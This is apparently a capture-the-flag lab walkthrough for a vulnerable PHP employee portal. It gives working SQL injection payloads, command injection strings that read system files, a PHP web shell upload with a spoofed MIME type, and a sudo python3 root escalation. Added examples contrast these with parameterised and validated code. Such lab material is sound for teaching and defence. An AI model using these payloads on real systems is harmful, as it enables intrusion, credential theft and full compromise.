Injectrix

An internal employee portal shipped to production without a security review. Three unpatched vulnerabilities sit in the same PHP codebase — SQL injection, command injection, and an unrestricted file upload. Chain them to own the box.


Walkthrough

Objective

Exploit three web vulnerabilities chained together to gain user and root access.

Attack Narrative

IntraPortal was rushed into production. The login form is vulnerable to SQL injection, the admin diagnostics panel passes user input directly to a shell, and the file upload handler trusts browser-supplied MIME types. Any one of these gets you a foothold — combining them demonstrates real attack depth.

Prerequisites

  • Ability to craft SQL injection payloads (authentication bypass and UNION extraction).
  • Familiarity with OS command injection via HTTP parameters.
  • Knowledge of MIME-type spoofing in file uploads.
  • SSH client for post-foothold access.

Phase 1: Web Application Enumeration

  1. Run a directory/content scan against port 80:
    gobuster dir -u http://TARGET/ -w /usr/share/wordlists/dirb/common.txt
    
  2. Browse the login page — note the form fields and POST action.
  3. Inspect page source for developer comments and hints.

Phase 2: SQL Injection — Authentication Bypass

The login query is constructed by direct string concatenation.

Bypass login (no credentials needed):

Username: ' OR '1'='1'-- -
Password: anything

Alternatively, extract credentials via UNION. The payload assumes the login SELECT returns four columns; if the database reports a column-count mismatch, adjust the number of values (probe with NULL placeholders until the query is accepted):

Username: ' UNION SELECT 1,username,password,'x' FROM users-- -
Password: anything

This dumps the users table and reveals labuser's SSH password in plaintext.
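Added example, not the lab's PHP: an in-memory SQLite model of the concatenated login query the walkthrough describes. It runs both payloads above verbatim (SQLite honours the same -- comment terminator), shows how to probe the column count before a UNION, and puts a parameterised query beside it. The table layout (id, username, password, role), the admin row and the four result columns are assumptions for the demo; only the labuser credentials appear on this page.

```python
"""SQLite model of the IntraPortal login query (added example)."""
import sqlite3

COLUMNS = "id, username, password, role"  # assumed schema, not from the lab


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, "
                "password TEXT, role TEXT)")
    # Constructed sample rows; the admin password is made up.
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "n0tTheRealAdminPw", "admin"),
        (2, "labuser", "WebL4b!2024", "user"),
    ])
    return con


def vulnerable_login(con, username, password):
    """Direct string concatenation, as the lab's PHP does."""
    sql = (f"SELECT {COLUMNS} FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchall()


def safe_login(con, username, password):
    """Bound parameters: the payload is compared as a literal string."""
    sql = f"SELECT {COLUMNS} FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()


def probe_column_count(con, max_cols=8):
    """Find how many columns the injectable SELECT returns by appending
    UNION SELECT NULL,NULL,... until the database stops complaining."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- -"
        try:
            vulnerable_login(con, payload, "x")
            return n
        except sqlite3.OperationalError:
            continue
    return None


BYPASS = "' OR '1'='1'-- -"
UNION_DUMP = "' UNION SELECT 1,username,password,'x' FROM users-- -"


def dump_credentials(con):
    """Run the walkthrough's UNION payload; the injected SELECT puts
    username and password in result columns 2 and 3."""
    rows = vulnerable_login(con, UNION_DUMP, "anything")
    return sorted((r[1], r[2]) for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("bypass rows:", vulnerable_login(db, BYPASS, "anything"))
    print("column count:", probe_column_count(db))
    print("dumped:", dump_credentials(db))
    print("parameterised:", safe_login(db, BYPASS, "anything"))
```

Against the concatenated query the bypass returns every row and the UNION returns the whole users table; against the parameterised query both payloads return nothing, because the quote and comment characters never reach the SQL parser.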

Phase 3: Admin Panel — OS Command Injection

After login, navigate to Diagnostics. The host parameter is passed unsanitised to shell_exec("ping -c 2 <HOST>").

# Confirm injection (send the semicolon as %3B if the client mangles it; + encodes a space)
?action=dashboard&tab=diag&host=127.0.0.1;id

# Read user flag directly (alternative to SSH)
?action=dashboard&tab=diag&host=127.0.0.1;cat+/home/labuser/user.txt
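Added example, not the lab's code: a Python model of the Diagnostics handler. It decodes the host parameter the way a web server would (%3B back to ; and + to a space, which is what the payloads above rely on), runs the vulnerable shell_exec-style call, and contrasts it with validation plus an argv list. echo stands in for ping so the demo runs offline; the shell-splitting behaviour is the same. The hostname regex is an assumption for the demo.

```python
"""Model of the Diagnostics 'ping -c 2 <HOST>' handler (added example)."""
import re
import subprocess
from urllib.parse import parse_qs

# echo stands in for the real ping binary so the demo needs no network.
PING_CMD = ["echo", "ping", "-c", "2"]

# Conservative hostname/IPv4 allowlist (assumed for the demo): letters,
# digits, dots and hyphens, no leading or trailing punctuation.
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def parse_host_param(query_string):
    """Decode host= as a web server would: %3B -> ';' and '+' -> ' '."""
    return parse_qs(query_string).get("host", [""])[0]


def vulnerable_diag(host):
    """shell=True hands the whole string to /bin/sh, so ';' terminates
    the ping command and whatever follows runs as a second command."""
    cmd = " ".join(PING_CMD) + " " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_host(host):
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return host


def hardened_diag(host):
    """Validate, then pass argv as a list: no shell is involved, so
    metacharacters are never interpreted even if validation slipped."""
    argv = PING_CMD + [validate_host(host)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    qs = "action=dashboard&tab=diag&host=127.0.0.1%3Becho+INJECTED"
    host = parse_host_param(qs)
    print("decoded host:", host)
    print("vulnerable output:\n" + vulnerable_diag(host))
    try:
        hardened_diag(host)
    except ValueError as err:
        print("hardened:", err)
```

The vulnerable path prints the ping line followed by the injected command's output; the hardened path rejects the same input before any process is spawned. The argv form on its own would already defeat the semicolon, but the validation step is what keeps a later refactor (or a different separator) from reopening the hole.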

Phase 4: SSH Foothold — User Flag

The Config tab reveals the service account credentials (or use UNION SQLi to extract them):

  • Username: labuser
  • Password: WebL4b!2024

ssh labuser@TARGET
cat ~/user.txt

Phase 5: File Upload — PHP Web Shell (Bonus)

The upload handler checks only Content-Type, not the file extension:

# Create a minimal PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Upload with spoofed Content-Type
curl -s -F "file=@shell.php;type=image/jpeg" "http://TARGET/?action=upload&tab=upload"

# Execute commands via the web shell
curl "http://TARGET/uploads/shell.php?cmd=id"

Phase 6: Privilege Escalation — sudo python3

sudo -l
# labuser may run: /usr/bin/python3 as root (NOPASSWD)

sudo python3 -c 'import os; os.execl("/bin/bash", "bash")'
cat /root/root.txt

Troubleshooting

  • SQLi bypass not working: verify comment syntax — try -- -, #, /**/.
  • Command injection blocked: check for WAF/filter — try %3B (URL-encoded semicolon).
  • Upload rejected: confirm Content-Type: image/jpeg is sent and not overridden by the client.
  • SSH password rejected: re-extract via UNION injection; check for trailing whitespace.

Verification Checklist

  • SQLi was proven and documented with a reproducible payload.
  • User flag captured from SSH session.
  • Root flag captured after sudo python3 escalation.

Tips and Tricks

  • Always check page source — developer comments often leak critical info.
  • For SQL injection, test single quote first, then boolean, then UNION.
  • Command injection: semicolon, pipe, backtick, $() are all separators.
  • MIME-type upload bypass: Content-Type is set by the client, so a server that checks only that header (rather than the extension or the file's magic bytes) has no way to know what you actually sent.

Useful Commands

sqlmap -u "http://TARGET/?action=login" --data "username=a&password=b" --dump
curl -s "http://TARGET/?action=dashboard&tab=diag&host=127.0.0.1;cat+/etc/passwd"
curl -F "file=@shell.php;type=image/jpeg" "http://TARGET/?action=upload&tab=upload"
